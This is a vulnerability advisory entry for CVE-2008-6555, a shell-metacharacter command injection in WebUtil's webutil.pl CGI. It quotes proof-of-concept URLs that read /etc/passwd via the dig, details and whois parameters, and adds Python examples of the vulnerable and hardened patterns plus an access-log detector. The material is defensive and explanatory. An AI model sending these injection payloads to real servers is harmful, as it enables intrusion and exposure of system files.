Puppet_Master Webutil 'webutil.pl' Remote dig Command Execution Vulnerability

Vulnerability ID 1114814 Vulnerability type Input validation
Published 2008-03-21 Updated 2009-03-31
CVE ID CVE-2008-6555 CNNVD ID CNNVD-200903-513
Platform CGI CVSS score 10.0
|Vulnerability sources
https://www.exploit-db.com/exploits/31466
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-513
|Vulnerability details
WebUtil is a simple network utility that displays standard network and host information through a browser: ping, traceroute, WHOIS lookups, host uptime, a calendar, DNS lookups, host, nslookup and similar. cgi-bin/webutil.pl in Puppet Master WebUtil allows remote attackers to execute arbitrary commands via shell metacharacters in the argument passed to the dig command: the value taken from the query string is spliced into a shell command line without validation, so a `|` followed by an attacker-chosen command runs with the privileges of the web server.
|Vulnerability EXP
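The bug class behind this advisory, as an added example that is not the webutil.pl source (the real tool is a Perl CGI; this Python stand-in reproduces the same shape of defect, and `echo dig` stands in for the dig binary so it runs offline). `vulnerable_dig` concatenates the query value into a `/bin/sh` command line, exactly as a Perl backtick or `system("dig $q")` call would. The payload mirrors the PoC URL: `$IFS` is the shell's field separator, so an unquoted `$IFS` expands to whitespace and `printf$IFS'%s'` becomes `printf '%s'`, which is why the original PoC can spell `cat /etc/passwd` without a space. `hardened_dig` whitelists the value against a hostname grammar and executes with an argv list, so no shell ever parses it; the grammar also forbids a leading `-`, which stops the value from being read as a dig option. All function names are this example's own.

```python
"""Command injection in a 'dig' CGI handler: vulnerable and hardened forms.

Added example, not the webutil.pl source. The CGI is assumed to take the
text after '?dig&' and pass it to dig.
"""
import re
import subprocess

# Stand-ins for the real dig binary so the example runs without dig installed.
DIG_SHELL = "echo dig"          # used in the vulnerable, shell-based form
DIG_ARGV = ["echo", "dig"]      # used in the hardened, argv-based form

# Whitelist grammar for a DNS hostname: labels of letters, digits and
# hyphens, no leading/trailing hyphen, optional trailing dot, <= 253 chars.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOST_RE = re.compile(rf"^(?=.{{1,253}}$){_LABEL}(?:\.{_LABEL})*\.?$")


def is_valid_hostname(query: str) -> bool:
    """True only for syntactically valid hostnames; any metacharacter fails."""
    return _HOST_RE.match(query) is not None


def vulnerable_dig(query: str) -> str:
    """The broken pattern: string concatenation into /bin/sh.

    Equivalent to Perl's `dig $query` or system("dig $query"): a '|' in the
    query turns the rest of it into a second command.
    """
    cmd = f"{DIG_SHELL} {query}"
    out = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return out.stdout


def hardened_dig(query: str) -> str:
    """Validate against the whitelist, then exec without a shell.

    With an argv list nothing interprets '|', ';', backticks or $IFS, and
    because a hostname cannot start with '-', the value can never be taken
    for a dig option either.
    """
    if not is_valid_hostname(query):
        raise ValueError(f"rejected query: {query!r}")
    out = subprocess.run(DIG_ARGV + [query], capture_output=True, text=True)
    return out.stdout


if __name__ == "__main__":
    # Harmless stand-in for the PoC payload '|cat$IFS/etc/passwd'.
    payload = "|printf$IFS'%s'$IFS'INJECTED'"
    print("vulnerable:", vulnerable_dig(payload).strip())     # INJECTED
    print("hardened  :", hardened_dig("www.example.com").strip())
    try:
        hardened_dig(payload)
    except ValueError as exc:
        print("hardened  :", exc)
```

The Perl equivalent of the fix is the list form, `system('dig', $host)`, after the same validation; with more than one argument Perl executes the program directly instead of handing the line to `/bin/sh`. Running the CGI under `perl -T` would additionally have flagged the tainted query value the moment it reached a `system` or backtick call.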
source: http://www.securityfocus.com/bid/28393/info

Webutil is prone to multiple vulnerabilities that attackers can leverage to execute arbitrary commands. These issues occur because the application fails to adequately sanitize user-supplied input.

Successful attacks can compromise the affected application and possibly the underlying computer.

These issues affect Webutil 2.3 and 2.7. 

http://www.example.com/cgi-bin/webutil.pl?details&|cat$IFS/etc/passwd
http://www.example.com/cgi-bin/webutil.pl?dig&|cat$IFS/etc/passwd
http://www.example.com/cgi-bin/webutil.pl?whois&|cat$IFS/etc/passwd
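A detection pass over web server access logs for the three PoC shapes above, as an added example that is not part of the advisory. It parses combined-format request lines, URL-decodes the target (so `%7C` is seen as `|`), splits the webutil.pl query into function name and argument, and flags any argument that carries a shell metacharacter. The log lines are constructed sample data; the IP addresses, timestamps and user agents are invented and the function names are this example's own.

```python
"""Flag webutil.pl command-injection attempts in access logs.

Added example, not part of the advisory. Input lines are constructed.
"""
import re
from urllib.parse import unquote

# Combined/common log format: client IP, then the quoted request line.
_REQ_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+)[^"]*"'
)
# Any of these in the argument means a shell would see more than a hostname.
_META_RE = re.compile(r"[|;&`$()<>{}\n]")

SAMPLE_LOG = """\
203.0.113.7 - - [21/Mar/2008:10:11:12 +0000] "GET /cgi-bin/webutil.pl?dig&|cat$IFS/etc/passwd HTTP/1.1" 200 1832 "-" "Mozilla/5.0"
203.0.113.7 - - [21/Mar/2008:10:11:19 +0000] "GET /cgi-bin/webutil.pl?whois&%7Cid HTTP/1.1" 200 321 "-" "curl/7.18.0"
198.51.100.4 - - [21/Mar/2008:10:12:01 +0000] "GET /cgi-bin/webutil.pl?dig&www.example.com HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
198.51.100.4 - - [21/Mar/2008:10:12:05 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""


def classify_request(target: str):
    """Return (function, argument) for a webutil.pl request, else None.

    The whole target is decoded first so that an encoded '|' or '&' cannot
    hide from the metacharacter check.
    """
    path, sep, query = unquote(target).partition("?")
    if not path.endswith("/webutil.pl") or not sep:
        return None
    func, _, arg = query.partition("&")
    return func, arg


def find_webutil_injections(lines):
    """Yield (ip, function, argument) for requests whose argument is unsafe."""
    hits = []
    for line in lines:
        m = _REQ_RE.match(line)
        if not m:
            continue
        parsed = classify_request(m.group("target"))
        if parsed is None:
            continue
        func, arg = parsed
        if _META_RE.search(arg):
            hits.append((m.group("ip"), func, arg))
    return hits


if __name__ == "__main__":
    for ip, func, arg in find_webutil_injections(SAMPLE_LOG.splitlines()):
        print(f"{ip} -> webutil.pl function={func!r} argument={arg!r}")
```

Matching on metacharacters rather than on the literal `$IFS` string keeps the rule useful against the other encodings of the same idea (`${IFS}`, `%7C`, backticks, `;`), and the decoded argument is kept in the hit so an analyst can see exactly what would have reached the shell.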
|References

Source: XF
Name: webutil-shell-command-execution (41400)
Link: http://xforce.iss.net/xforce/xfdb/41400
Source: BID
Name: 28393
Link: http://www.securityfocus.com/bid/28393
Source: BUGTRAQ
Name: 20080321 webutil.pl is still vulnerable against Remote Command Execution.
Link: http://www.securityfocus.com/archive/1/archive/1/489961/100/0/threaded
Source: OSVDB
Name: 51181
Link: http://osvdb.org/51181